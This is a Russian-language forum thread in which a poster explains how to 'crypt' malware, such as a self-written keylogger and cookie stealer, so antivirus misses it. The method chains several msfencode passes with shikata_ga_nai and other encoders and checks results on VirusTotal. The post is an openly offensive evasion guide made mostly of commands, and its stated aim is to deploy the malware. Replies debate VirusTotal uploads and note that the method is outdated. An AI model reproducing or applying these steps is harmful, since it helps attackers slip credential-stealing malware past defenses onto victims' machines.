Криптуем вирус (FUD)

funnyman4ik

Активный участник
Дней с нами
3.543
Розыгрыши
0
Сообщения
51
Репутация
55
Реакции
21
Долго искал, как закриптовать вирус, наконец попалась эта инфа. В принципе с самописным кейлогер+кукистиллер сработало. Изначально показатель на VT был 17, после данных процедур - 0.

Я использовал Backtrack. На счет Kali - не знаю, но думаю данная утилита должна быть.

Что нам необходимо:
1. Backtrack OS
2. MSF encoders

Итак, наш первый шаг - создать вирусный файл с помощью любого из таких инструментов, как RAT, бот-нет, или что-то еще. Чтобы сделать это FUD (Fully Undetectable), мы используем backtrack. Прежде чем отправляться в FUD, проверьте файл на virustotal.com, и мы получим коэффициент обнаружения, например, скажем, 30/44

Теперь запустите терминал в Backtrack и перейдите в каталог, в котором находится ваш файл.
E.g. cd Desktop

Итак, наш первый шаг - изменить разрешения этого файла (775), введя эту команду: root@bt:~/Desktop# chmod 775 stub.exe

Далее введите эту команду для кодирования вашего вируса:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o /root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10

Вы заметите, что Антивирус все еще обнаружил это, хотя мы закодировали его 10 раз с “x86/shikata_ga_nai” encoder. Теперь снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 server2.exe

Теперь, 2-й раз, мы используем другой кодировщик с именем «jmp_call_additive»
root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o /root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1


Снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 server3.exe

Далее мы используем другой кодировщик “call4_dword_xor”:
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o /root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1

Теперь снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 server4.exe

Кодируем окончательно, используя “shikata_ga_nai” :
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o /root/Desktop/final.exe -e x86/shikata_ga_nai -c 1

Теперь снова измените разрешения этого выходного файла:
root@bt:~/Desktop# chmod 775 final.exe

Теперь вы получите файл final.exe, загрузите его на virustotal.com, и вы увидите результаты
 
нах это нужно?
 
И теперь оторвите автору руки
Не когда не загружаете вирусы на virustotal
Я к тому, чтобы посмотреть какой результат. Если уж ты собираешься этот вирус использовать, то, конечно, не заливай.... не думал, что такие люди найдутся здесь, которые не поймут, к чему это написано.
 
Спасибо за качественную информацию!
 
Способ уже много лет не работает и половину вирусов не поддерживает, лично проверенно несколько лет назад!
 
Способ уже много лет не работает и половину вирусов не поддерживает, лично проверенно несколько лет назад!
Тема полугодовой давности, а чего ты ожидал?